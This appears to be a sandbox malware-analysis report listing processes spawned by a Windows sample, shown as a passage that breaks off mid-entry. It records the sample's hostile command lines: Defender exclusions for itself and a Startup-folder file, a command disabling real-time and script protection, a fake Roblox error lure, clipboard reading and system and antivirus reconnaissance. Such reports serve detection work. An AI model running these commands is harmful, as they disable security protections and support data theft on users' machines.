                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\X9g8L63QGs.exe'
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please open roblox', 0, 'Roblox Process Not Found!', 0+16);close()"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff703620000
                                                                                                                                                                                                                                                                  File size:14'848 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:21
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c6d10000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:22
                                                                                                                                                                                                                                                                  Start time:01:19:11
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:24
                                                                                                                                                                                                                                                                  Start time:01:19:14
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:25
                                                                                                                                                                                                                                                                  Start time:01:19:14
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:26
                                                                                                                                                                                                                                                                  Start time:01:19:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                                                                                                                                                                                                  Imagebase:0x7ff605d00000
                                                                                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:27
                                                                                                                                                                                                                                                                  Start time:01:19:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:28
                                                                                                                                                                                                                                                                  Start time:01:19:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:29
                                                                                                                                                                                                                                                                  Start time:01:19:15
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                                                                                                                                                                                  Imagebase:0x7ff605d00000
                                                                                                                                                                                                                                                                  File size:77'312 bytes
                                                                                                                                                                                                                                                                  MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:30
                                                                                                                                                                                                                                                                  Start time:01:19:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                                                  Start time:01:19:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:32
                                                                                                                                                                                                                                                                  Start time:01:19:17
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                  Start time:01:19:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                                                  Start time:01:19:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                                                  Start time:01:19:20
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                                                  Start time:01:19:21
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                                                  Start time:01:19:21
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                                                  Start time:01:19:21
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                                                                                                                                                                                                                                                                  Imagebase:0x7ff741d30000
                                                                                                                                                                                                                                                                  File size:452'608 bytes
                                                                                                                                                                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7a7b90000
                                                                                                                                                                                                                                                                  File size:289'792 bytes
                                                                                                                                                                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                  Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                                  Imagebase:0x7ff6c6d10000
                                                                                                                                                                                                                                                                  File size:106'496 bytes
                                                                                                                                                                                                                                                                  MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                  Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                                                                                                                                                                  Imagebase:0x7ff7c2f70000
                                                                                                                                                                                                                                                                  File size:576'000 bytes
                                                                                                                                                                                                                                                                  MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                                                  Start time:01:19:22
                                                                                                                                                                                                                                                                  Start date:05/01/2025
                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
